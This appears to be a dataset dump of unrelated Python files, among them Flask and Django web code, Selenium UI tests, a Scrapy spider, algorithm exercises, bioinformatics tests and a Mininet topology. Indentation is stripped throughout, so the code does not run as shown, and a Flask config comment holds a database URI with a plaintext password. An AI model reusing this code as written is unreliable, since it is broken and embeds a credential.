return "Method " + request.method + " on resource " + resource + \
" not implemented!", 501, {"content-type": "text/plain; charset: utf-8"}
@app.route('/api/<resource>/<primary_key>/<related_resource>',methods = ['GET','POST'])
def related_resource(resource,primary_key,related_resource):
in_args,fields,body,offset,limit = parse_and_print_args()
if request.method == 'GET':
result = SimpleBO.find_by_fk(resource,primary_key,related_resource,in_args,fields,limit,offset)
url = request.url
url_root = request.url_root
all_resource = resource+"/"+primary_key+"/"+related_resource
links=SimpleBO.generate_links(url,url_root,all_resource,in_args,fields,offset,limit,result)
output=[{"data":result,
"links":links}]
return json.dumps(output), 200, \
{"content-type": "application/json; charset:utf-8"}
elif request.method == 'POST':
result = SimpleBO.Insert(related_resource,body)
return json.dumps(result), 200, \
{"content-type": "application/json; charset:utf-8"}
else:
return "Method " + request.method + " on resource " + resource + \
" not implemented!", 501, {"content-type": "text/plain; charset: utf-8"}
@app.route('/api/teammates/<playerid>', methods=['GET'])
def get_teammates(playerid):
in_args,fields,body,offset,limit = parse_and_print_args()
if request.method == 'GET':
result = SimpleBO.find_teammates(playerid,limit,offset)
url = request.url
url_root = request.url_root
resource = 'teammates/'+playerid
links=SimpleBO.generate_links(url,url_root,resource,in_args,fields,offset,limit,result)
output=[{"data":result,
"links":links}]
return json.dumps(output), 200, \
{"content-type": "application/json; charset:utf-8"}
@app.route('/api/people/<playerid>/career_stats', methods=['GET'])
def get_career_stats(playerid):
in_args,fields,body,offset,limit = parse_and_print_args()
if request.method == 'GET':
result = SimpleBO.find_career_stats(playerid,limit,offset)
url = request.url
url_root = request.url_root
resource = 'people/'+playerid+'/career_stats'
links=SimpleBO.generate_links(url,url_root,resource,in_args,fields,offset,limit,result)
output=[{"data":result,
"links":links}]
return json.dumps(output), 200, \
{"content-type": "application/json; charset:utf-8"}
else:
return "Method " + request.method + " on resource " + resource + \
" not implemented!", 501, {"content-type": "text/plain; charset: utf-8"}
@app.route('/api/roster', methods=['GET'])
def get_roster():
in_args,fields,body,offset,limit = parse_and_print_args()
if request.method == 'GET':
result = SimpleBO.find_roster(in_args,limit,offset)
url = request.url
url_root = request.url_root
resource = 'roster'
links=SimpleBO.generate_links(url,url_root,resource,in_args,fields,offset,limit,result)
output=[{"data":result,
"links":links}]
return json.dumps(output), 200, \
{"content-type": "application/json; charset:utf-8"}
else:
return "Method " + request.method + " on resource " + resource + \
" not implemented!", 501, {"content-type": "text/plain; charset: utf-8"}
if __name__ == '__main__':
app.run()
|
5,617 | f4aaf0449bff68814090552ea4f6ccac85dacf1b | # coding=utf-8
"""SCALE UI: feature tests."""
import pytest
import xpaths
from function import (
wait_on_element,
is_element_present,
wait_on_element_disappear
)
from pytest_bdd import (
given,
scenario,
then,
when,
)
@pytest.mark.dependency(name='Set_Group')
@scenario('features/NAS-T1250.feature', 'Verify that you can create a new group')
def test_verify_that_you_can_create_a_new_group():
"""Verify that you can create a new group."""
@given('the browser is open, navigate to the SCALE URL, and login')
def the_browser_is_open_navigate_to_the_scale_url_and_login(driver, nas_ip, root_password):
"""the browser is open, navigate to the SCALE URL, and login."""
if nas_ip not in driver.current_url:
driver.get(f"http://{nas_ip}")
assert wait_on_element(driver, 10, xpaths.login.user_Input)
if not is_element_present(driver, xpaths.side_Menu.dashboard):
assert wait_on_element(driver, 10, xpaths.login.user_Input)
driver.find_element_by_xpath(xpaths.login.user_Input).clear()
driver.find_element_by_xpath(xpaths.login.user_Input).send_keys('root')
driver.find_element_by_xpath(xpaths.login.password_Input).clear()
driver.find_element_by_xpath(xpaths.login.password_Input).send_keys(root_password)
assert wait_on_element(driver, 5, xpaths.login.signin_Button)
driver.find_element_by_xpath(xpaths.login.signin_Button).click()
else:
assert wait_on_element(driver, 10, xpaths.side_Menu.dashboard, 'clickable')
driver.find_element_by_xpath(xpaths.side_Menu.dashboard).click()
@when('on the dashboard click on Credentials and Local Groups')
def on_the_dashboard_click_on_credentials_and_local_groups(driver):
"""on the dashboard click on Credentials and Local Groups."""
assert wait_on_element(driver, 10, xpaths.dashboard.title)
assert wait_on_element(driver, 10, xpaths.dashboard.system_Info_Card_Title)
assert wait_on_element(driver, 10, xpaths.side_Menu.credentials, 'clickable')
driver.find_element_by_xpath(xpaths.side_Menu.credentials).click()
assert wait_on_element(driver, 10, xpaths.side_Menu.local_Group, 'clickable')
driver.find_element_by_xpath(xpaths.side_Menu.local_Group).click()
@then('on the Groups page, click Add')
def on_the_groups_page_click_add(driver):
"""on the Groups page, click Add."""
assert wait_on_element(driver, 10, xpaths.groups.title)
assert wait_on_element(driver, 10, xpaths.button.add, 'clickable')
driver.find_element_by_xpath(xpaths.button.add).click()
@then('on the Add Group side box input the group name')
def on_the_add_group_side_box_input_the_group_name(driver):
"""on the Add Group side box input the group name."""
assert wait_on_element(driver, 7, xpaths.add_Group.title)
assert wait_on_element(driver, 7, xpaths.add_Group.name_Input, 'inputable')
driver.find_element_by_xpath(xpaths.add_Group.name_Input).clear()
driver.find_element_by_xpath(xpaths.add_Group.name_Input).send_keys('qetest')
@then('click save and verify the group was added')
def click_save_and_verify_the_group_was_added(driver):
"""click save and verify the group was added."""
assert wait_on_element(driver, 7, xpaths.button.save, 'clickable')
driver.find_element_by_xpath(xpaths.button.save).click()
assert wait_on_element_disappear(driver, 20, xpaths.progress.progressbar)
assert wait_on_element(driver, 10, xpaths.groups.title)
assert wait_on_element(driver, 10, xpaths.groups.qetest_Name)
|
5,618 | 129c7f349e2723d9555da44ae62f7cfb7227b9ae | from django.shortcuts import render
from django.views.generic import View #导入View
from .models import UpdateDbData,User
from wanwenyc.settings import DJANGO_SERVER_YUMING
from .forms import UpdateDbDataForm
# Create your views here.
#添加场景的view
class UpdateDbDataView(View): #继承View
"""
测试数据复制编写页面处理
"""
def get(self,request,testupdatadb_id):
if request.user.username == 'check':
return render(request, "canNotAddupdatedbdata.html",{
"django_server_yuming":DJANGO_SERVER_YUMING
})
elif request.user.is_active:
updatedbdata = UpdateDbData.objects.get(id=int(testupdatadb_id)) #获取用例
updatedbdata_all = UpdateDbData.objects.all().order_by("-id")
return render(request,"updatedbdata/updatedbdata.html",
{"updatedbdata":updatedbdata,
"updatedbdata_all":updatedbdata_all,
"django_server_yuming": DJANGO_SERVER_YUMING,
})
else:
return render(request,"addContentError.html",{
"django_server_yuming": DJANGO_SERVER_YUMING
})
def post(self, request,testupdatadb_id):
username = request.user.username
updatedbdata_all = UpdateDbData.objects.all().order_by("-id")
updatedbdata_form = UpdateDbDataForm(request.POST) # 实例化updatedbdataForm()
updatedbdata = UpdateDbData.objects.get(id=int(testupdatadb_id)) # 获取用例
if updatedbdata_form.is_valid(): # is_valid()判断是否有错
updatedbdata_form.save(commit=True) # 将信息保存到数据库中
zj = UpdateDbData.objects.all().order_by('-add_time')[:1][0] # 根据添加时间查询最新的
user = User.objects.get(username=username)
zj.write_user_id = user.id
zj.save()
updatedbdataid = zj.id
updatedbdataadd = UpdateDbData.objects.get(id=int(updatedbdataid)) # 获取用例
return render(request, "updatedbdata/updatedbdata.html", {
"updatedbdata": updatedbdataadd,
"updatedbdata_all": updatedbdata_all,
"sumsg":u"添加测试用例---【{}】---成功,请继续添加".format(updatedbdataadd.test_case_title),
"django_server_yuming": DJANGO_SERVER_YUMING,
})
else:
return render(request, 'updatedbdata/updatedbdataForm.html', {
"updatedbdata": updatedbdata,
"updatedbdata_all": updatedbdata_all,
"updatedbdataform": updatedbdata_form,
"errmsg":u"添加失败,请重新添加,添加时请检查各个字段是否填写",
"django_server_yuming": DJANGO_SERVER_YUMING,
}) # 返回页面,回填信息
|
5,619 | 700d6e0c7dab58ed0157265ff78021923c17e397 | j= float(input("juros"))
Q0= 1500
t= 36
Qf=Q0*(1+j)**t
print(round(Qf,2)) |
5,620 | 8a7536b998a6d122e2e7529af1ebe2a0f025303f | import requests
from datetime import date
from datetime import timedelta
def get_offset_date(modifed_date, offset_in_days):
return date.isoformat(modifed_date + timedelta(days=int(offset_in_days)))
def get_trending_repositories(start_search_date, number_of_results=20):
github_api_uri = 'https://api.github.com'
query_search_url = '{}/search/repositories'.format(github_api_uri)
query_parameters = {'q': 'created:>{}'.format(start_search_date),
'sort': 'stars',
'order': 'desc',
'per_page': number_of_results}
trending_repositories_json_list = requests.get(query_search_url,
query_parameters).json()['items']
result_trending_list = []
for repository in trending_repositories_json_list:
repository_name = repository['name']
repoditory_owner = repository['owner']['login']
result_trending_list.append({'repo_name': str(repository_name),
'repo_owner': str(repoditory_owner),
'stars': repository['stargazers_count'],
'issues': repository['open_issues'],
'url': repository['html_url']
})
return result_trending_list
def get_open_issues_amount(repo_owner, repo_name):
github_api_uri = 'https://api.github.com'
query_search_url = '{0}/repos/{1}/{2}/issues'.format(github_api_uri,
repo_owner,
repo_name)
issues_json_data = requests.get(query_search_url).json()
number_of_open_issues = len([ x for x in issues_json_data if x['state'] == 'open' ])
return number_of_open_issues
def print_result_to_console():
print('Program prints {} most popular repositories since {}\n'.format(number_of_results, week_earlier_date))
for index, repo in enumerate(top_repositories_list):
good_choice_label = ''
if not repo['issues']:
good_choice_label = 'Try it!'
print('{0:2} {4:7} {1:70} {2:5} stars {3:2} issues'.format(index + 1,
repo['url'],
repo['stars'],
repo['issues'],
good_choice_label))
if __name__ == '__main__':
date_offset_in_days = -7
week_earlier_date = get_offset_date(date.today(), date_offset_in_days)
number_of_results = 20
top_repositories_list = get_trending_repositories(week_earlier_date,
number_of_results)
print_result_to_console()
|
5,621 | 40aa9e7cf0aaca24054297ca80aaf468ba485966 | """ binary_adder.py: Takes two arrays representing binary numbers,
adds them together. """
__author__ = "David Vaillant"
__credits__ = "CLRS, Chapter 2.1"
def binary_add(x, y):
""" Adds two binary arrays together. """
# Makes sure that the arrays have the same length.
# Could be changed to padding on extra zeroes, if so desired.
assert(len(x) == len(y))
z = [0] * (len(x)+1)
for a, (i, j) in enumerate(zip(x[::-1], y[::-1])):
# Makes sure that the array is a binary array.
# Strictly speaking, not necessary. But nice.
if i not in [0, 1]: return False
if j not in [0, 1]: return False
# if i and j are both 1
if i and j:
z[a] += 0
z[a+1] += 1
# if only one of them is 1
elif i or j:
z[a] += 1
# if they're both 0
else: pass
if z[a] == 2:
z[a+1] += 1
z[a] -= 2
return z[::-1]
def unit_test():
""" Unit tests. """
x_arr = ( [1, 0, 0],
[1],
[0],
[1, 0, 0, 1],
[1, 1, 1, 1],
[1, 0, 0, 0, 0])
y_arr = ( [0, 1, 1],
[0],
[0, 0],
[1, 1, 0, 0],
[0, 0, 0, 0],
[1, 0, 0, 0, 0])
z_arr = ( [0, 1, 1, 1],
[0, 1],
None,
[1, 0, 1, 0, 1],
[0, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0] )
for a, (x, y) in enumerate(zip(x_arr, y_arr)):
sum = binary_add(x, y)
print("Adding {} to {}.".format(x, y))
if sum == z_arr[a]:
print("Successfully returned {}.".format(sum))
else:
print("Got {} instead of {}.".format(sum, z_arr[a]))
print()
if __name__ == "__main__":
unit_test()
|
5,622 | d827c59871d58e098009c22320af73f8f40169bb | from scrapy.selector import HtmlXPathSelector
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors.sgml import SgmlLinkExtractor
from scrapy.item import Item, Field
import scrapy
import config
from scrapy.linkextractors import LinkExtractor
from scrapy.http import Request
class BrokenItem(Item):
url = Field()
referer = Field()
status = Field()
class BrokenLinksSpider(CrawlSpider):
handle_httpstatus_list = [404]
name = config.name
allowed_domains = config.allowed_domains
start_urls = config.start_urls
def parse(self, response):
if response.status == 404:
F=open("404links.txt","a")
F.write(response.url+"\n")
F.close()
else:
extractor = LinkExtractor(allow_domains=self.allowed_domains)
links = extractor.extract_links(response)
for link in links:
new_request = Request(link.url, callback=self.parse)
yield new_request
|
5,623 | 12ca9a81574d34d1004ac9ebcb2ee4b31d7171e2 | variable_1 = 100
variable_2 = 500
variable_3 = 222.5
variable_4 = 'Hello'
variable_5 = 'world'
print(variable_1, variable_2, variable_3, sep=', ')
print(variable_4, variable_5, sep=', ', end='!\n')
user_age = input('Введите ваш возраст: ')
user_name = input('Введите ваше имя: ')
print(variable_4 + ', ' + user_name + '! ' + 'Ваш возраст: ' + user_age)
|
5,624 | 61388b2edb35055cccbdc98ed52caedcd0b02983 | import numpy as np
import string
import networkx as nx
import matplotlib.pyplot as plt
def PlotUndirectedGraph(A,color):
NodesNames = list(string.ascii_uppercase);
NNodes = A.shape[0]
G = nx.DiGraph()
for i in range(NNodes):
G.add_node(NodesNames[i])
for i in range(NNodes):
for j in range(i+1,NNodes):
if A[i,j] != 0:
G.add_edge(NodesNames[i],NodesNames[j],weight=A[i,j])
pos = nx.spring_layout(G)
edge_labels=dict([((u,v,),d['weight'])
for u,v,d in G.edges(data=True)])
if len(color)==0:
#edge_colors = ['black' if not edge in red_edges else 'red' for edge in G.edges()]
nx.draw_networkx_nodes(G, pos, node_size=400, node_color = 'skyblue')
else:
nx.draw_networkx_nodes(G, pos, node_size=400, node_color = color, cmap=plt.cm.Pastel1)
#nx.draw(G,pos, node_color = values, node_size=1500,edge_color=edge_colors,edge_cmap=plt.cm.Reds)
nx.draw_networkx_labels(G, pos, edge_labels=edge_labels)
nx.draw_networkx_edges(G, pos, arrows = False)
nx.draw_networkx_edge_labels(G, pos, edge_labels=edge_labels)
plt.show()
|
5,625 | f9234741c6356b4677b5d32ffea86549d001c258 | """
Quick select (randomized selection algorithm)
- based on quick sort (ch8_sorting); used to obtain the ith-smallest element in an unordered list of items (e.g.numbers)
"""
def swap(unsorted_array, a, b):
temp = unsorted_array[a]
unsorted_array[a] = unsorted_array[b]
unsorted_array[b] = temp
def partition(unsorted_array, first_index, last_index):
# these 2 lines added, comparing to quick_sort partition
# => there's only one element in our sublist => return any of the function parameters
if first_index == last_index:
return first_index
# This choice to make the 1st element the pivot is a random decision.
# It often does not yield a good split and subsequently a good partition.
# However, the ith element will eventually be found.
pivot = unsorted_array[first_index]
pivot_index = first_index
index_of_last_element = last_index
less_than_pivot_index = index_of_last_element
greater_than_pivot_index = first_index + 1
while True:
while unsorted_array[greater_than_pivot_index] < pivot and greater_than_pivot_index < last_index:
greater_than_pivot_index += 1
while unsorted_array[less_than_pivot_index] > pivot and less_than_pivot_index >= first_index:
less_than_pivot_index -= 1
if greater_than_pivot_index < less_than_pivot_index:
temp = unsorted_array[greater_than_pivot_index]
swap(unsorted_array, greater_than_pivot_index, less_than_pivot_index)
else:
break
unsorted_array[pivot_index] = unsorted_array[less_than_pivot_index]
unsorted_array[less_than_pivot_index] = pivot
# returns the pivot index pointed to by less_than_pivot_index
return less_than_pivot_index
# parameters: the index of the first, the last, the ith element
def quick_select_helper(unsorted_array, left, right, k):
# returns the split index = the position in the unordered list where
# all elements between right to split-1 are < the element contained in the array split,
# while all elements between split+1 to left are greater.
split_point = partition(unsorted_array, left, right)
if split_point == k:
return unsorted_array[k]
# => the kth-smallest item should exist/be found between split+1 and right:
elif split_point < k:
return quick_select_helper(unsorted_array, split_point + 1, right, k)
else:
return quick_select_helper(unsorted_array, left, split_point - 1, k)
def quick_select(unsorted_array, k):
quick_select_helper(unsorted_array, 0, len(unsorted_array) - 1, k)
u_array = [43, 3, 20, 4, 89, 77]
quick_select(u_array, 1)
print(u_array)
|
5,626 | 60b1a77d2de4a52ae9597f88917c4a3996c99923 | from src.secStructure import *
from suffix_trees import STree
import math
import re
def test_processData():
# Test1: ignoring peak position
data = ['example/example1.fa', 'example/example2.fa']
struct_data = ['example/exampleStrucData/exampleStructuralData1.fa',
'example/exampleStrucData/exampleStructuralData2.fa']
k = 3
top = 10
peak = None
feature = None
cmd = False
no_sec_peak = 1 # True
# Executing
process = SecStructure(data, data, k, peak, top, feature, cmd, struct_data, no_sec_peak)
alphabet1 = process.getStructProfile1().getAlphabet()
alphabet2 = process.getStructProfile2().getAlphabet()
kmer_counts1 = process.getStructProfile1().getProfile()
kmer_counts2 = process.getStructProfile2().getProfile()
results = SecStructure.processData(process)
template1 = results[0][0]
template2 = results[1][0]
dotbracket_string1 = results[0][1]
dotbracket_string2 = results[1][1]
# Testing
assert len(alphabet1) == 6
for e in ["S", "H", "B", "I", "M", "E"]:
assert e in alphabet1
assert len(alphabet2) == 2
assert "S" in alphabet2
assert "E" in alphabet2
assert kmer_counts1 == {'EE': 4, 'ES': 1, 'SS': 11, 'SH': 1, 'HH': 3, 'II': 4, 'IS': 1, 'SM': 1, 'MM': 1, 'BB': 4,
'BS': 1}
assert kmer_counts2 == {'SS': 20, 'EE': 7, 'ES': 3, 'SE': 2}
assert template1 == "EEESSSIIISSSBBBSSSHHHSSSSSSIIISSSMMMSSSHHHSSSEEE"
assert dotbracket_string1 == "...(((...(((...(((...))))))...)))...(((...)))..."
assert template2 == "EEESSSSSSEEE"
assert dotbracket_string2 == "...((()))..."
# Test2: with peak position
no_sec_peak = 0 # True
# Executing
process2 = SecStructure(data, data, k, peak, top, feature, cmd, struct_data, no_sec_peak)
alphabet1 = process2.getStructProfile1().getAlphabet()
alphabet2 = process2.getStructProfile2().getAlphabet()
kmer_counts1 = process2.getStructProfile1().getProfile()
kmer_counts2 = process2.getStructProfile2().getProfile()
results = SecStructure.processData(process2)
template1 = results[0][0]
template2 = results[1][0]
dotbracket_string1 = results[0][1]
dotbracket_string2 = results[1][1]
# Testing
assert len(alphabet1) == 10
for e in ["s", "h", "b", "i", "m", "E", "S", "B", "I", "E"]:
assert e in alphabet1
assert len(alphabet2) == 4
for e in ["s", "S", "e", "E"]:
assert e in alphabet2
assert kmer_counts1 == {'eE': 1, 'Es': 1, 'sS': 1, 'Sh': 1, 'iI': 1, 'Is': 1, 'bB': 1, 'Bs': 1}
assert kmer_counts2 == {'sS': 3, 'Ss': 2, 'sE': 1, 'Ee': 1, 'Se': 1}
assert template1 == "EEESSSIIISSSBBBSSSSSSSSSIIISSSEEE"
assert dotbracket_string1 == "...(((...(((...((())))))...)))..."
assert template2 == "EEESSSSSSEEE"
assert dotbracket_string2 == "...((()))..."
# Test3: different alphabets
sProfile1 = process.getStructProfile1()
sProfile2 = process.getStructProfile2()
# Test3a: alphabets with no multiloop
alphabet3 = ["S", "B", "E"]
alphabet4 = ["S", "I", "E"]
sProfile1.setAlphabet(alphabet3)
sProfile2.setAlphabet(alphabet4)
results = SecStructure.processData(process)
template1 = results[0][0]
template2 = results[1][0]
dotbracket_string1 = results[0][1]
dotbracket_string2 = results[1][1]
assert template1 == "EEESSSBBBSSSSSSSSSEEE"
assert dotbracket_string1 == "...(((...((())))))..."
assert template2 == "EEESSSIIISSSSSSIIISSSEEE"
assert dotbracket_string2 == "...(((...((()))...)))..."
# Test3b: alphabets with only hairpin or hairpin and multiloop
alphabet5 = ["S", "H", "E"]
alphabet6 = ["S", "H", "M", "E"]
sProfile1.setAlphabet(alphabet5)
sProfile2.setAlphabet(alphabet6)
results = SecStructure.processData(process)
template1 = results[0][0]
template2 = results[1][0]
dotbracket_string1 = results[0][1]
dotbracket_string2 = results[1][1]
assert template1 == "EEESSSHHHSSSEEE"
assert dotbracket_string1 == "...(((...)))..."
assert template2 == "EEESSSHHHSSSMMMSSSHHHSSSEEE"
assert dotbracket_string2 == "...(((...)))...(((...)))..."
# Test3c: ('flawed') alphabets with no multiloops
alphabet7 = ["S", "H", "E", "B", "I"]
alphabet8 = ["S", "M", "E"] # should be equal to ["S","E"]
sProfile1.setAlphabet(alphabet7)
sProfile2.setAlphabet(alphabet8)
results = SecStructure.processData(process)
template1 = results[0][0]
template2 = results[1][0]
dotbracket_string1 = results[0][1]
dotbracket_string2 = results[1][1]
assert template1 == "EEESSSIIISSSBBBSSSHHHSSSSSSIIISSSEEE"
assert dotbracket_string1 == "...(((...(((...(((...))))))...)))..."
assert template2 == "EEESSSSSSEEE"
assert dotbracket_string2 == "...((()))..."
def test_createColorVector():
# Test1: no normalization vector wanted
k = 2
no_sec_peak = 1
template = "EEESSSIIISSSBBBSSSHHHSSSSSSIIISSSEEE"
kmer_counts = {"EE": 5, "ES": 7, "SS": 20, "SI": 10, "II": 15, "IS": 11, "SB": 5, "BB": 6, "BS": 5, "SH": 4,
"HH": 5, "HS": 4, "SE": 7}
template_sTree = STree.STree(template)
normalization_vector1 = None
color_hm = {str(i): 0 for i in range(1, len(template) + 1)}
# Executing
new_color_hm1, not_matched1, color_domain_max1 = createColorVector(k, template_sTree, kmer_counts, color_hm,
no_sec_peak, normalization_vector1)
assert len(color_hm) == len(new_color_hm1)
for i in color_hm.keys():
x = color_hm[i]
if x > 0:
assert new_color_hm1[i] == math.log(x, 2)
else:
assert new_color_hm1[i] == 0
assert len(not_matched1) == 0
assert color_domain_max1 == 4.954196310386876
# Test2: with normalization vector
normalization_vector2 = {"EE": 0, "ES": 0, "SS": 0.7, "SI": 0.1, "II": 0.2, "IS": 0, "SB": 0, "BB": 0, "BS": 0,
"SH": 0, "HH": 0, "HS": 0, "SE": 0}
# Execution
color_hm = {str(i): 0 for i in range(1, len(template) + 1)}
new_color_hm2, not_matched2, color_domain_max2 = createColorVector(k, template_sTree, kmer_counts, color_hm,
no_sec_peak, normalization_vector2)
last_idx = -1
last_kmer = ""
test_color_hm = {str(i): 0 for i in range(1, len(template) + 1)}
for kmer in normalization_vector2:
indices_list = [t.start() for t in re.finditer('(?={0})'.format(re.escape(kmer)), template)]
indices_list.sort()
norm = normalization_vector2[kmer]
if norm == 0:
norm = 1
for idx in indices_list:
for i in range(0, k):
current_idx = str(idx + i + 1)
if last_idx + 2 == int(current_idx) and last_kmer == kmer:
continue
test_color_hm[current_idx] += (kmer_counts[kmer] / norm)
last_idx = idx
last_kmer = kmer
test_color_hm = {x: math.log(y, 2) if y > 0 else y for x, y in test_color_hm.items()}
test_color_domain_max = max(test_color_hm.values())
# Testing
assert new_color_hm1 is not new_color_hm2
assert len(color_hm) == len(new_color_hm2)
assert len(not_matched2) == 0
assert color_domain_max2 == test_color_domain_max
for i in new_color_hm2.keys():
assert new_color_hm2[i] == test_color_hm[i]
# Test3: normalization vector and secondary peak position
kmer_counts2 = {"Ee": 5, "eS": 7, "sS": 20, "Si": 10, "iI": 15, "iS": 11, "Sb": 5, "Bb": 6, "bS": 5, "sH": 4,
"Hh": 5, "hS": 4, "Se": 7}
no_sec_peak2 = 0
# Execution
color_hm = {str(i): 0 for i in range(1, len(template) + 1)}
new_color_hm3, not_matched3, color_domain_max3 = createColorVector(k, template_sTree, kmer_counts2, color_hm,
no_sec_peak2, normalization_vector2)
test_color_hm2 = {str(i): 0 for i in range(1, len(template) + 1)}
for kmer in kmer_counts2.keys():
indices_list = [t.start() for t in re.finditer('(?={0})'.format(re.escape(kmer.upper())), template)]
indices_list.sort()
norm = normalization_vector2[kmer.upper()]
if norm == 0:
norm = 1
for idx in indices_list:
# use only peak-position in 2-mer for visualization
idx = [idx + i for i in range(0, len(kmer)) if kmer[i].isupper()][0]
test_color_hm2[str(idx + 1)] += (kmer_counts2[kmer] / norm)
test_color_hm2 = {x: math.log(y, 2) if y > 0 else y for x, y in test_color_hm2.items()}
test_color_domain_max2 = max(test_color_hm2.values())
# Testing
assert len(not_matched3) == 0
assert new_color_hm2 is not new_color_hm3
assert len(color_hm) == len(new_color_hm3)
for i in test_color_hm2:
assert test_color_hm2[i] == new_color_hm3[i]
assert test_color_domain_max2 == color_domain_max3
def test_helpAddIBloop():
k = 3
# Test 1: forward and all true
template1 = ["EEE"]
internalloop = True
bulge = True
forward = True
# Execution
new_template1 = helpAddIBloop(k, template1, internalloop, bulge, forward)
# Test 2: backward and all true
template2 = ["EEE", "SSS", "III", "SSS", "BBB", "SSS", "HHH"]
internalloop = True
bulge = True
forward = False
# Execution
new_template2 = helpAddIBloop(k, template2, internalloop, bulge, forward)
# Test 3: only internal loops, forward and backward
template3_f = ["EEE"]
template3_b = ["EEE", "SSS", "III", "SSS", "HHH"]
internalloop = True
bulge = False
forward = True
# Execution
new_template3_f = helpAddIBloop(k, template3_f, internalloop, bulge, forward)
forward = False
new_template3_b = helpAddIBloop(k, template3_b, internalloop, bulge, forward)
# Test 4: only bulges, forward and backward
template4_f = ["EEE"]
template4_b = ["EEE", "SSS", "BBB", "SSS", "HHH"]
internalloop = False
bulge = True
forward = True
# Execution
new_template4_f = helpAddIBloop(k, template4_f, internalloop, bulge, forward)
forward = False
new_template4_b = helpAddIBloop(k, template4_b, internalloop, bulge, forward)
# Testing
assert new_template1 == ["EEE", "SSS", "III", "SSS", "BBB"]
assert new_template2 == ["EEE", "SSS", "III", "SSS", "BBB", "SSS", "HHH", "SSS", "SSS", "III"]
assert new_template3_f == ["EEE", "SSS", "III"]
assert new_template3_b == ["EEE", "SSS", "III", "SSS", "HHH", "SSS", "III"]
assert new_template4_f == ["EEE", "SSS", "BBB"]
assert new_template4_b == ["EEE", "SSS", "BBB", "SSS", "HHH", "SSS"]
def test_element2dotbracket():
k3 = 3
k2 = 2
k4 = 4
# Test1 without multiloop
elem_list1 = ["EEE", "SSS", "III", "SSS", "BBB", "SSS", "HHH", "SSS", "SSS", "III", "SSS", "EEE"]
dotbracket_string1 = "...(((...(((...(((...))))))...)))..."
# Test2 with multiloop
elem_list2 = ["EE", "SS", "II", "SS", "HH", "SS", "II", "SS", "MM", "SS", "BB", "SS", "HH", "SS", "SS", "EE"]
dotbracket_string2 = "..((..((..))..))..((..((..)))).."
# Test 3 without loops
elem_list3 = ["EEEE", "SSSS", "SSSS", "EEEE"]
dotbracket_string3 = "....(((())))...."
# Test 5 with everything
elem_list4 = ["EEE", "SSS", "III", "SSS", "BBB", "SSS", "HHH", "SSS", "SSS", "III", "SSS", "MMM", "SSS", "HHH",
"SSS", "EEE"]
dotbracket_string4 = "...(((...(((...(((...))))))...)))...(((...)))..."
# Execution
db1 = []
db1.extend(element2dotbracket(elem_list1, k3, 0, 6, True))
db1.extend(element2dotbracket(elem_list1, k3, 7, len(elem_list1) - 1, False))
db1 = ''.join(db1)
db2 = []
db2.extend(element2dotbracket(elem_list2, k2, 0, 4, True))
db2.extend(element2dotbracket(elem_list2, k2, 5, 8, False))
db2.extend(element2dotbracket(elem_list2, k2, 9, 12, True))
db2.extend(element2dotbracket(elem_list2, k2, 13, len(elem_list2) - 1, False))
db2 = ''.join(db2)
db3 = []
db3.extend(element2dotbracket(elem_list3, k4, 0, 1, True))
db3.extend(element2dotbracket(elem_list3, k4, 2, len(elem_list3) - 1, False))
db3 = ''.join(db3)
db4 = []
db4.extend(element2dotbracket(elem_list4, k3, 0, 6, True))
db4.extend(element2dotbracket(elem_list4, k3, 7, 11, False))
db4.extend(element2dotbracket(elem_list4, k3, 12, 13, True))
db4.extend(element2dotbracket(elem_list4, k3, 14, len(elem_list4) - 1, False))
db4 = ''.join(db4)
# testing
assert db1 == dotbracket_string1
assert db2 == dotbracket_string2
assert db3 == dotbracket_string3
assert db4 == dotbracket_string4
|
5,627 | f494d8aeee8c72cce8fc14e44ca896bcf30c100a | from config import Config
from flask import Flask
from flask_cors import CORS
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
CORS(app)
app.config.from_object(Config)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///ws.db'
# app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://api:uyLmQ5M1AjCvm1R2@localhost/ws'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
migrate = Migrate(app, db)
from ws import routes
|
5,628 | 8c69813bc576a56c25c828fe24e2707e65ac0d0d | #!/usr/bin/python
"""
demo_mininet_topo.py
Sample topology class with Mininet.
G = {V, E}
V = {h1, h2, h3, h4, h51, h52, s0, s1, s4, s5}
# of hosts = 6
# of switches = 4
E = {
(h1, s1), (h2, s1), (h3, s1),
(h4, s4),
(h51, s5), (h52, s5),
(s0, s1), (s0, s4), (s5, s4)
}
"""
from mininet.topo import Topo
class DemoTopology(Topo):
def __init__(self):
Topo.__init__(self)
# Add some hosts
h1 = self.h1 = self.addHost('h1')
h2 = self.h2 = self.addHost('h2')
h3 = self.h3 = self.addHost('h3')
h4 = self.h4 = self.addHost('h4')
h51 = self.h51 = self.addHost('h51')
h52 = self.h52 = self.addHost('h52')
# Add switches
s0 = self.s0 = self.addSwitch('s0')
s1 = self.s1 = self.addSwitch('s1')
s4 = self.s4 = self.addSwitch('s4')
s5 = self.s5 = self.addSwitch('s5')
# Link hosts with switches
self.addLink(h1, s1)
self.addLink(h2, s1)
self.addLink(h3, s1)
self.addLink(h4, s4)
self.addLink(h51, s5)
self.addLink(h52, s5)
# Link switches with switches
self.addLink(s0, s1)
self.addLink(s0, s4)
self.addLink(s5, s4)
topos = {
'demo': lambda: DemoTopology()
} |
5,629 | 9e05f883d80d7583c9f7e16b2fb5d3f67896388d | from auction_type import AuctionType
from bid import Bid
class Auction(object):
def __init__(self, name, type, status, start_price, buy_now_price):
self.name = name
self.type = type
self.status = status
if AuctionType.BID == type:
self.start_price = start_price
self.bids = []
if AuctionType.BUY_NOW == type:
self.buy_now_price = buy_now_price
def add_bid(self, price):
self.bids.append(Bid(price))
|
5,630 | 535c0975c688a19963e4c53f6029626d286b41d6 | import random
import colorama
from termcolor import colored
from reusables.string_manipulation import int_to_words
from app.common_functions import comma_separated, add_dicts_together, remove_little_words, odds
from app.load_data import items, buildings, wild_mobs, names, adjectives
colorama.init()
def find_unique_names(quantity, name_list, taken_names):
free_names = [x for x in name_list if x not in taken_names]
random.shuffle(free_names)
return free_names[:quantity]
def dropper(rarity):
results = {'super rare': 100,
'rare': 50,
'uncommon': 25,
'common': 5,
'super common': 2}
quantity = 0
countdown = random.randint(0, 10)
while countdown > 0:
if random.randint(0, results[rarity]) == 1:
quantity += 1
countdown -= 1
return quantity
def drop_building(dictionary, p, limit=None):
